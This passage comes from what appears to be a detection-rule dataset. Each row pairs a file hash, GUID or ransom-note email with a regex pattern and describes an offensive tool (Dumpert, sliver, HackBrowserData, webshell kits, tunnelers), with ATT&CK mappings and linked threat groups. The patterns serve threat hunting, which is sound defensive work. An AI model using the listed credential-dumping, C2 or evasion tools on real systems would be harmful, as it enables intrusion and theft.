Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30501" "*8903483f5b5e84041ec7a90bab38a4b430c28925717cb09c3199f46952046aa7*",".{0,1000}8903483f5b5e84041ec7a90bab38a4b430c28925717cb09c3199f46952046aa7.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","0","#filehash","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","30502" "*8904000180688b0ba69b2bc6647fc42c34ed9fce15ed7687d53958f9f9ac6357*",".{0,1000}8904000180688b0ba69b2bc6647fc42c34ed9fce15ed7687d53958f9f9ac6357.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","30503" 
"*8905becea35b76ddcebac536548ccf08a14eb684fac25063a350c9d0b3a95369*",".{0,1000}8905becea35b76ddcebac536548ccf08a14eb684fac25063a350c9d0b3a95369.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30504" "*8909f956ab41ad565935485870d05b47db8482c703aa7ea142ef1eff310e8b89*",".{0,1000}8909f956ab41ad565935485870d05b47db8482c703aa7ea142ef1eff310e8b89.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30505" "*890f13ab9ee7ea722baf0ceb3ee561c0*",".{0,1000}890f13ab9ee7ea722baf0ceb3ee561c0.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","30506" "*8915669ca2e25c835fbc5c022b3f1d62fab4569190e216a4b37a8d1e4f94208c*",".{0,1000}8915669ca2e25c835fbc5c022b3f1d62fab4569190e216a4b37a8d1e4f94208c.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#filehash","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","30509" "*89269edf8f752740d81254dd68ae0c8ed29d18cfb8582620e4759b48ad47ddb3*",".{0,1000}89269edf8f752740d81254dd68ae0c8ed29d18cfb8582620e4759b48ad47ddb3.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30513" "*8932afe71961b1dc93c851471a11f50329aab1715cfb60875c087c94a29a1910*",".{0,1000}8932afe71961b1dc93c851471a11f50329aab1715cfb60875c087c94a29a1910.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30515" "*89379d7dcc96b1f8399884532c399c7522bdde6aed85b483e1ff81c6deab4f7b*",".{0,1000}89379d7dcc96b1f8399884532c399c7522bdde6aed85b483e1ff81c6deab4f7b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30516" "*893CC775-335D-4010-9751-D8C8E2A04048*",".{0,1000}893CC775\-335D\-4010\-9751\-D8C8E2A04048.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#GUIDproject","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","30517" "*89420ce0d71a81a4612e5bdd7de722bed41c31dbe4e0287e5222708f687d1936*",".{0,1000}89420ce0d71a81a4612e5bdd7de722bed41c31dbe4e0287e5222708f687d1936.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - 
T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30518" "*894399f27a67fa61608ef9a098bf9dc3ec009582d98193616cde9ab3b59f7a51*",".{0,1000}894399f27a67fa61608ef9a098bf9dc3ec009582d98193616cde9ab3b59f7a51.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","30520" "*8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb*",".{0,1000}8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","30521" "*8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb*",".{0,1000}8943acdb8de2a40ca4fd8e1a2f98029aa6e8d78c9f19430b6ac557b6fb8ce4cb.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","30522" "*894a784e-e04c-483c-a762-b6c03e744d0b*",".{0,1000}894a784e\-e04c\-483c\-a762\-b6c03e744d0b.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#GUIDproject","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","30523" "*894A784E-E04C-483C-A762-B6C03E744D0B*",".{0,1000}894A784E\-E04C\-483C\-A762\-B6C03E744D0B.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#GUIDproject","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","30524" "*8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e*",".{0,1000}8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30525" "*895b297899e043df918c8b93301014d48fc1d9ddf926174ea1ad5cf05cc7c79a*",".{0,1000}895b297899e043df918c8b93301014d48fc1d9ddf926174ea1ad5cf05cc7c79a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30526" "*896106aa70f9ffdb5b219cbc1abcbdcff59bf05a339dcf9a2b9e095160f59e98*",".{0,1000}896106aa70f9ffdb5b219cbc1abcbdcff59bf05a339dcf9a2b9e095160f59e98.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","30529" 
"*896b78750aa60555dd7ade5976010943ee946359b51cf2b4b2314e4613d617ac*",".{0,1000}896b78750aa60555dd7ade5976010943ee946359b51cf2b4b2314e4613d617ac.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30530" "*896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4*",".{0,1000}896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30531" "*896f5c5de9ee24be5ff08ee6b543a15752c57c43efefad3be85451db9c560576*",".{0,1000}896f5c5de9ee24be5ff08ee6b543a15752c57c43efefad3be85451db9c560576.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30532" "*897243728161@thesecure.biz*",".{0,1000}897243728161\@thesecure\.biz.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","30533" 
"*89781c80b442ef36a857bdf403b7ecf12e9876a059ec81ebae250f387afbec63*",".{0,1000}89781c80b442ef36a857bdf403b7ecf12e9876a059ec81ebae250f387afbec63.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30534" "*89789cc0ae92f6b6cc77463942253e26ce68539db7d029c63c46f16f9ee2b489*",".{0,1000}89789cc0ae92f6b6cc77463942253e26ce68539db7d029c63c46f16f9ee2b489.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30535" "*89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b*",".{0,1000}89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30537" "*899f9cdb99255c88ba4af54556c52f24d5ef0c6911663efef02ddd15f0934409*",".{0,1000}899f9cdb99255c88ba4af54556c52f24d5ef0c6911663efef02ddd15f0934409.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30540" "*89a0c5bfa07f8c0114208173eb77b9a49a43cee5694c5111dd178ea0b51c51f0*",".{0,1000}89a0c5bfa07f8c0114208173eb77b9a49a43cee5694c5111dd178ea0b51c51f0.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30541" "*89a674622f27cf3b03f04ee2da6bba953ea1843d0d1ffe4f62881f4ab4741caf*",".{0,1000}89a674622f27cf3b03f04ee2da6bba953ea1843d0d1ffe4f62881f4ab4741caf.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30543" "*89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9*",".{0,1000}89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30544" "*89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1*",".{0,1000}89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30547" "*89bdca2cd5edd0c7e5b3f99ff817f8df7ab449c188dad0f5eae526600df80656*",".{0,1000}89bdca2cd5edd0c7e5b3f99ff817f8df7ab449c188dad0f5eae526600df80656.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30550" "*89bfa445e98341969422b43a84c9751b15eb7db2b10e2be755629d04b4cd2a31*",".{0,1000}89bfa445e98341969422b43a84c9751b15eb7db2b10e2be755629d04b4cd2a31.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30551" "*89c2214589dff9530c6367d2968ba26cd9533eb279b88dc755b06d66ed575428*",".{0,1000}89c2214589dff9530c6367d2968ba26cd9533eb279b88dc755b06d66ed575428.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","30553" "*89cb2fcaf93e959f54a336545ba2935749e33c624c0bd08a8ebfff72aea8d627*",".{0,1000}89cb2fcaf93e959f54a336545ba2935749e33c624c0bd08a8ebfff72aea8d627.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30554" "*89ce01a4f096106970ed68939f64e6ff319ce9b8a07c3cef1db0e88029ba2466*",".{0,1000}89ce01a4f096106970ed68939f64e6ff319ce9b8a07c3cef1db0e88029ba2466.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30555" "*89d37b998b4dde0492d237508a2521a79768d284f8d184a017fcbe444393307c*",".{0,1000}89d37b998b4dde0492d237508a2521a79768d284f8d184a017fcbe444393307c.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","30556" 
"*89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8*",".{0,1000}89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30557" "*89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18*",".{0,1000}89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30558" "*89d678050ee670535a84b9e38557f626b1c704a9998e528a58e7cee830378283*",".{0,1000}89d678050ee670535a84b9e38557f626b1c704a9998e528a58e7cee830378283.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","30559" "*89dd31e34f17eb509798b7d6fb51df74d38cb3e31c0f6422a934bc8b92f185ba*",".{0,1000}89dd31e34f17eb509798b7d6fb51df74d38cb3e31c0f6422a934bc8b92f185ba.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30560" "*89e27312c55e98af1c2f4882a53b08abc4a54fc8d6c09959447f2444b3ccece1*",".{0,1000}89e27312c55e98af1c2f4882a53b08abc4a54fc8d6c09959447f2444b3ccece1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30562" "*89e5abaa609aee8b15058958c28b4821708fffb607202669ef33803cb2a80104*",".{0,1000}89e5abaa609aee8b15058958c28b4821708fffb607202669ef33803cb2a80104.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30564" "*89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b*",".{0,1000}89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30565" 
"*89ec75e91e04d7e807868b19dbf8adfe109d62762b4c2afc0e4ee6fd37ef7df7*",".{0,1000}89ec75e91e04d7e807868b19dbf8adfe109d62762b4c2afc0e4ee6fd37ef7df7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30566" "*89f57029ae1ecd8d584040360ea4450d4bbd20e1339fd6c1c2ce6faaf7a1e8a9*",".{0,1000}89f57029ae1ecd8d584040360ea4450d4bbd20e1339fd6c1c2ce6faaf7a1e8a9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30567" "*89fa21c871572c227274d7836c88e815b748db63f6a662553a43cc1dd086667c*",".{0,1000}89fa21c871572c227274d7836c88e815b748db63f6a662553a43cc1dd086667c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30568" "*89fb18f0ffce36584def6266ae92f8b5273f2d89de96772625845f77c64ef0dc*",".{0,1000}89fb18f0ffce36584def6266ae92f8b5273f2d89de96772625845f77c64ef0dc.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and 
Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30569" "*89fb415ca8b0055c8d4af09cf603469e36cb256899d7e0eca024e3f555f5513b*",".{0,1000}89fb415ca8b0055c8d4af09cf603469e36cb256899d7e0eca024e3f555f5513b.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30570" 